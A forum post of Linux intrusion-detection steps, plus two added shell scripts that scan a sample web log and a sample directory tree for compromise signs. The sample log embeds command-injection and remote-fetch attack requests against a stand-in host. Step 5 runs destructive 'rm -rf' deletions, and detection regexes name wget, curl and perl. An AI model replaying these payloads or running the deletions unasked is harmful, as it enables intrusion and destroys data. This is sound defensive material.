Advice: these are steps compiled from the network and from some books; they were not done by me.
 
Hello..
 
I have a few incomplete steps to check whether I have an intruder in my Linux system, but I really would like to have all your suggestions to make a good doc about this matter, so please post your tips and tricks about this subject.
 
1.- Download and run Rkhunter & Chkrootkit.
2.- Run "w", and "netstat -nalp | grep SSHPORTHERE" to see who is connected using SSH.
3.- Search for SSH and FTP accepted logins.

Code:
	last
	cat /var/log/secure* | grep ssh | grep Accept
	cat /var/log/secure* | grep ftp | grep Accept
	grep ftp /var/log/messages

4.- Watch current connections and scan your ports.

Code:
	netstat -nalp
	nmap -p 1-65535 localhost

5.- Search for suspicious content in commonly exploitable dirs.

Code:
	# the rm lines destroy what they find; run the ls lines first if you want to keep evidence
	rm -rf /tmp/sess*
	rm -rf /var/dos-*
	rm -rf /var/tmp/ssh-*
	rm -rf /var/tmp/dos-*
	ls /tmp -lab
	ls /var/tmp -labR
	ls /dev/shm -labR
	ls /usr/local/apache/proxy -labR
	ls /usr/local/samba -labR

6.- Check these files for anomalies.

Code:
	less /etc/passwd
	less /etc/shadow
	less /etc/group

7.- Search for new users in sudoers, check wtmp, and make sure telnet is not running.

Code:
	cat /etc/sudoers
	who /var/log/wtmp
	cat /etc/xinetd.d/telnet

8.- Find bash history files.

Code:
	find / -iname .bash_history

9.- Verify the crontab table.

Code:
	# lists only the current user's crontab; other users' tables live under /var/spool/cron
	crontab -l

10.- Update the slocate database and search for exploits.

Code:
	updatedb &

For cPanel servers:

Code:
	egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
	egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*

For Ensim servers:

Code:
	egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*

Search for shell code:

Code:
	# Apache logs a raw 0x90 (NOP) byte as the four characters \x90
	grep -F '\x90\x90' /path/of/your/web/logs/*

11.- Search for hidden dirs.

Code:
	locate "..."
	locate ".. "
	locate " .."
	locate ". "
	locate " ."

12.- Search for perl scripts running.

Code:
	# the [p] keeps the grep process itself out of the result
	ps aux | grep '[p]erl'

13.- Check the nobody user and open files.

Code:
	service httpd stop
	lsof -u nobody

Please, add your tips and tricks about this.
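Here is an added example (mine, not from the original post) of the step-10 log search run as a script over a constructed sample log. The egrep pattern is the one from the post; the NOP-sled check assumes Apache's default log escaping, which writes a raw 0x90 byte to the access log as the four characters \x90. The IPs, paths, timestamps and user agents in the sample log are made up for the example.

```bash
#!/bin/sh
# Added example, not the post's own code: run the step-10 web-log patterns
# (plus a NOP-sled check) over a constructed sample access log.
set -u

# Pattern from the post: chr( / system( calls, or a download/build tool
# followed by a URL-encoded space (e.g. wget%20http://...).
INJECT_RE='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'
# Assumption: Apache writes a raw 0x90 byte to its log as the four characters
# \x90, so a run of them is the NOP sled of a binary exploit attempt.
NOPSLED_RE='(\\x90){4,}'

# Print each suspicious line from log file $1, tagged with which check fired.
scan_log() {
    grep -Ei "$INJECT_RE" "$1" | sed 's/^/[inject]  /'
    grep -E  "$NOPSLED_RE" "$1" | sed 's/^/[nopsled] /'
}

# Number of suspicious lines in $1 (what a cron job or a test would key on).
count_hits() {
    scan_log "$1" | wc -l | tr -d ' '
}

# Constructed sample log in Apache combined format (everything in it is
# invented): three normal requests, two command injections, one NOP sled.
make_sample_log() {
    cat > "$1" <<'EOF'
198.51.100.7 - - [10/Mar/2008:10:12:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2008:10:12:05 +0000] "GET /images/logo.png HTTP/1.1" 200 8877 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2008:10:13:44 +0000] "GET /index.php?page=http://203.0.113.9/x.txt?cmd=wget%20http://203.0.113.9/bd.pl HTTP/1.1" 200 12 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Mar/2008:10:13:50 +0000] "GET /index.php?page=;system(%27id%27) HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Mar/2008:10:14:02 +0000] "GET /cgi-bin/\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0 HTTP/1.0" 400 226 "-" "-"
198.51.100.7 - - [10/Mar/2008:10:15:10 +0000] "GET /perl-docs/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF
}

# Stand-alone run: build the sample, scan it, report the count (3 here).
sample=$(mktemp)
make_sample_log "$sample"
scan_log "$sample"
echo "suspicious lines: $(count_hits "$sample")"
rm -f "$sample"
```

On a real box, point scan_log at the log paths from step 10 instead of the sample; the "perl-docs" line is in the sample on purpose, to show that the pattern needs the %20 after the tool name and does not fire on an ordinary path that merely contains "perl".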

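Another added example (again mine, not the post's): steps 8 and 11 done with find instead of locate, so they work on a box where updatedb has not run, or against a mounted disk image instead of the live root. The extra check for a .bash_history that is a symlink (usually to /dev/null) or empty is my addition to step 8; the directory tree the script is run on is constructed for the example.

```bash
#!/bin/sh
# Added example, not the post's own code: the step-11 hidden-directory hunt
# and the step-8 history search done with find, over a constructed tree.
set -u

# Directory names made only of dots and spaces ("...", ".. ", " ..", ". ",
# " .", " "). Nothing legitimate creates them; intruders use them because
# they hide next to "." and ".." in ls output.
find_hidden_dirs() {
    find "$1" -type d \( -name '...' -o -name '....' -o -name '.. ' -o -name ' ..' \
                         -o -name '. ' -o -name ' .' -o -name ' ' -o -name '  ' \) 2>/dev/null
}

# Added check: .bash_history files that are a symlink (typically to /dev/null)
# or empty. A login user whose history cannot be written deserves a look.
find_bad_histories() {
    find "$1" -name .bash_history \( -type l -o \( -type f -size 0 \) \) 2>/dev/null
}

hidden_dir_count()  { find_hidden_dirs "$1"   | wc -l | tr -d ' '; }
bad_history_count() { find_bad_histories "$1" | wc -l | tr -d ' '; }

# Constructed tree standing in for a root filesystem (or a mounted image):
# one normal user, one with an emptied history, and four hidden-style dirs,
# one of them holding a history symlinked to /dev/null.
make_sample_tree() {
    mkdir -p "$1/home/alice/.ssh" "$1/home/bob" \
             "$1/var/tmp/.../rk" "$1/dev/shm/. " "$1/tmp/ .." "$1/usr/lib/ "
    echo 'ls -la' > "$1/home/alice/.bash_history"
    : > "$1/home/bob/.bash_history"
    ln -s /dev/null "$1/var/tmp/.../.bash_history"
}

# Stand-alone run against the sample tree; on a real system pass / or the
# mount point of the image instead of $base.
base=$(mktemp -d)
make_sample_tree "$base"
echo "hidden dirs:";            find_hidden_dirs "$base"
echo "suspicious histories:";   find_bad_histories "$base"
rm -rf "$base"
```

Quote the results when you act on them (the names contain spaces), and treat a .ssh directory as normal; it is in the sample precisely so that the dot-name patterns are shown not to match ordinary hidden directories.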